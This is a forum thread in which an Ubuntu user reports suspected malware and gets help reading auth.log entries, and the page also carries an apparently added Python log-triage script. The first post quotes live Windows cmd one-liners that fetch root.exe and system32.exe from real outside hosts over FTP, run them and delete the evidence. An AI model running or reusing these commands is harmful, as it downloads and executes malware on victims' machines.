Page 1 of 2
Results 1 to 10 of 15

Thread: Virus via Windows?

  1. #1
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Virus via Windows?

    I am on Ubuntu 12.04 and using LO 3.5.4

    I woke up this morning to find this displayed on my PC in a LO Writer file:

    2011-12 Governor 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned

    cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.

    Parts of this kept appearing in strange places on documents I was working on yesterday...I recognise some of it.

    It is obviously some kind of Windows virus and is interfering with LO......

    a) where does it hide b) how can I eliminate it c) how can I ensure it does not get passed on to Windows users?
    Ubuntu is computer speak for defenestration

  2. #2
    Join Date
    Jun 2007
    Location
    Arizona, USA
    Beans
    223
    Distro
    Lubuntu 12.10 Quantal Quetzal

    Re: Virus via Windows?

    You didn't mention if you are running or have disabled macros. That's the first place to look for bad guys coming out of MSFT Office into LibreOffice.
    Last edited by uRock; September 5th, 2012 at 06:00 AM. Reason: MSFT
    The future will soon be a thing of the past.

  3. #3
    Join Date
    Feb 2010
    Location
    Land of Confusion
    Beans
    8,400
    Distro
    Ubuntu 16.04 Xenial Xerus

    Re: Virus via Windows?

    Moved to Security Discussions.

  4. #4
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by Guilden_NL
    You didn't mention if you are running or have disabled macros. That's the first place to look for bad guys coming out of MSFT Office into LibreOffice.
    There is a very high probability that this virus came via a docx file. I have macros enabled, but on High Security level...I have looked in the macros folders for the Writer file that was opened on my PC and contained the above...but there is no obvious macro that contains these commands.
    Last edited by dunbrokin; September 5th, 2012 at 06:43 AM.
    Ubuntu is computer speak for defenestration

  5. #5
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    This morning when I went to my machine, I saw that the remote viewer was active (which is very strange indeed) and that it was connected to a site beginning with 77.xx.xx.xx - I was so shocked (and assumed that I have been breached) that I clicked off the remote viewer without recording what site it was connected to.....is there a way that I can find, in the logs maybe, what that site IP is?

    It also looks from the logs that there was a su command by nobody....and as nobody appears in the script above, I am wondering if that su command was issued by the virus. How would I know if the su command was accepted by root or not, i.e. whether my password has been breached and access has been granted to my files?

    Here from my log:

    Aug 26 20:30:01 joan-HP-Mini-5102 CRON[26099]: pam_unix(cron:session): session closed for user root
    Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: Successful su for nobody by root
    Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: + ??? root:nobody
    Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: pam_unix(su:session): session opened for user nobody by (uid=0)
    Aug 26 20:38:53 joan-HP-Mini-5102 su[26596]: pam_unix(su:session): session closed for user nobody
    Aug 26 21:17:01 joan-HP-Mini-5102 CRON[27134]: pam_unix(cron:session): session opened for user root by (uid=0)
    Aug 26 21:17:01 joan-HP-Mini-5102 CRON[27134]: pam_unix(cron:session): session closed for user root
    Aug 26 22:17:01 joan-HP-Mini-5102 CRON[27419]: pam_unix(cron:session): session opened for user root by (uid=0)
    Last edited by dunbrokin; September 5th, 2012 at 10:43 PM.
    Ubuntu is computer speak for defenestration

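The auth.log lines quoted in post #5 can be triaged mechanically. The following is an added example written for this page, not code from the thread: it parses the classic syslog layout, pairs each su result line with its "+ tty caller:target" companion, and labels root cron sessions. Two facts it relies on: su(1) logs "Successful su for TARGET by CALLER", so "for nobody by root" is root dropping to nobody (a caller that is already uid 0 is never asked for a password, so this line says nothing about the user's password), and "???" is what su records when it has no controlling terminal. The first sample is the excerpt from post #5 reproduced as posted; the second (a failed su to root) is constructed to show the escalation path and does not come from the poster's log.

```python
import re

# The auth.log excerpt from post #5, reproduced line for line (used as sample input).
SAMPLE_AUTH_LOG = """\
Aug 26 20:30:01 joan-HP-Mini-5102 CRON[26099]: pam_unix(cron:session): session closed for user root
Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: Successful su for nobody by root
Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: + ??? root:nobody
Aug 26 20:37:39 joan-HP-Mini-5102 su[26596]: pam_unix(su:session): session opened for user nobody by (uid=0)
Aug 26 20:38:53 joan-HP-Mini-5102 su[26596]: pam_unix(su:session): session closed for user nobody
Aug 26 21:17:01 joan-HP-Mini-5102 CRON[27134]: pam_unix(cron:session): session opened for user root by (uid=0)
Aug 26 21:17:01 joan-HP-Mini-5102 CRON[27134]: pam_unix(cron:session): session closed for user root
Aug 26 22:17:01 joan-HP-Mini-5102 CRON[27419]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# Constructed lines (NOT from the poster's log): what a failed attempt to become root looks like.
SAMPLE_FAILED = """\
Aug 27 03:12:44 joan-HP-Mini-5102 su[30001]: FAILED su for root by nobody
Aug 27 03:12:44 joan-HP-Mini-5102 su[30001]: - ??? nobody:root
"""

# Classic syslog layout: "Mon DD HH:MM:SS host prog[pid]: message".
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
# su(1): "Successful su for TARGET by CALLER" / "FAILED su for TARGET by CALLER",
# followed by "+ TTY CALLER:TARGET" (success) or "- TTY CALLER:TARGET" (failure).
# TTY is "???" when su had no controlling terminal (script, cron, daemon).
SU_RESULT_RE = re.compile(r"^(?P<result>Successful|FAILED) su for (?P<target>\S+) by (?P<caller>\S+)$")
SU_TTY_RE = re.compile(r"^[+-] (?P<tty>\S+) (?P<caller>[^:]+):(?P<target>\S+)$")
CRON_OPEN_RE = re.compile(r"^pam_unix\(cron:session\): session opened for user (?P<user>\S+)")


def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def su_events(lines):
    """One record per su attempt: caller, target, success, tty, and whether it was an
    escalation (a non-root caller becoming root) rather than root dropping privileges."""
    by_pid, order = {}, []
    for raw in lines:
        rec = parse_line(raw)
        if not rec or rec["prog"] != "su":
            continue
        pid = rec["pid"]
        m = SU_RESULT_RE.match(rec["msg"])
        if m:
            ev = by_pid.setdefault(pid, {"time": rec["time"], "pid": pid, "tty": None})
            ev.update(
                caller=m["caller"], target=m["target"],
                success=(m["result"] == "Successful"),
                escalation=(m["target"] == "root" and m["caller"] != "root"),
            )
            if pid not in order:
                order.append(pid)
            continue
        m = SU_TTY_RE.match(rec["msg"])
        if m and pid in by_pid:
            by_pid[pid]["tty"] = None if m["tty"] == "???" else m["tty"]
    return [by_pid[p] for p in order]


def cron_root_sessions(lines):
    """Label each root cron session. Stock Ubuntu /etc/crontab runs cron.hourly at
    minute 17 of every hour, so a session opened at HH:17:0x is expected noise."""
    out = []
    for raw in lines:
        rec = parse_line(raw)
        if not rec or rec["prog"] != "CRON":
            continue
        m = CRON_OPEN_RE.match(rec["msg"])
        if not m or m["user"] != "root":
            continue
        _, mm, ss = rec["time"].split(":")
        label = "cron.hourly" if mm == "17" and int(ss) < 10 else "other cron job"
        out.append({"time": rec["time"], "pid": rec["pid"], "label": label})
    return out


if __name__ == "__main__":
    for src in (SAMPLE_AUTH_LOG, SAMPLE_FAILED):
        for ev in su_events(src.splitlines()):
            print("su", ev["time"], f"{ev['caller']} -> {ev['target']}",
                  "OK" if ev["success"] else "FAILED",
                  "tty=" + (ev["tty"] or "none"),
                  "ESCALATION" if ev["escalation"] else "privilege drop / lateral")
    for s in cron_root_sessions(SAMPLE_AUTH_LOG.splitlines()):
        print("cron", s["time"], s["label"])
```

Run it against the full /var/log/auth.log (and the rotated auth.log.1, auth.log.*.gz) rather than the excerpt; any record with escalation set, or any su with a tty of "???" whose caller is a service account, is the one to chase.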
  6. #6
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: Virus via Windows?

    There are several sites I'm aware of that can help you find out interesting things about specific IP addresses, including who to complain to. There are often limits to what you can learn without the benefit of the co-operation of service providers, but at least it's a start.

    One place to start might be http://whatismyipaddress.com/ip-lookup
    Last edited by lisati; September 6th, 2012 at 02:37 AM. Reason: Fix typo
    Forum DOs and DON'Ts
    Please use CODE tags
    Including your email address in a post is not recommended
    My Blog

  7. #7
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by lisati
    There are several sites I'm aware of that can help you find out interesting things about specific IP addresses, including who to complain to. There are often limits to what you can learn without the benefit of the co-operation of service providers, but at least it's a start.

    One place to start might be http://whatismyipaddress.com/ip-lookup
    Thanks for that...but first I need to know which IP it was connected to.
    Ubuntu is computer speak for defenestration

  8. #8
    Join Date
    Sep 2007
    Location
    Oklahoma, USA
    Beans
    2,362
    Distro
    Xubuntu 16.04 Xenial Xerus

    Re: Virus via Windows?

    You can look up that "89.19.29.116" IP address shown in your first post. Those lines form a (Windows-only) script that will connect to that site via FTP and download a file, presumably of malware, as "root.exe" and then subsequently execute and delete it.

    To locate that "77.x.x.x" IP you can search through /var/log/syslog and its older copies. These files will be large, but may contain references to IP addresses that can help you.

    The openings for root shown in your auth.log excerpt, that happen at 17 minutes past the hour, are normal cron.hourly tasks. The others, however, may be a bit suspicious.
    --
    Jim Kyle in Oklahoma, USA
    Linux Counter #259718
    Howto mark thread: https://wiki.ubuntu.com/UnansweredPo.../SolvedThreads

  9. #9
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by JKyleOKC
    You can look up that "89.19.29.116" IP address shown in your first post. Those lines form a (Windows-only) script that will connect to that site via FTP and download a file, presumably of malware, as "root.exe" and then subsequently execute and delete it.

    To locate that "77.x.x.x" IP you can search through /var/log/syslog and its older copies. These files will be large, but may contain references to IP addresses that can help you.

    The openings for root shown in your auth.log excerpt, that happen at 17 minutes past the hour, are normal cron.hourly tasks. The others, however, may be a bit suspicious.
    Thanks for that...I will search the /var/log/syslog as you suggest. What do people advise should be my next step?
    Ubuntu is computer speak for defenestration

  10. #10
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    962
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    I have searched all the logs that I can find....but I cannot see anywhere an indication of when I connect to my machine using VPN or when I connect to other machines using VPN. Neither can I see any log of when my machine connects nightly to JungleDisk to do a backup. Where might these be?

    I have used the Tiger chkroot and that does not show anything sinister....so, I am beginning to suspect my sugar-rushed imagination and am coming to the conclusion that, in all probability, I have not been compromised.

    However, I would still like to check out those logs to see where VPN and the JD connection actually show.
    Ubuntu is computer speak for defenestration
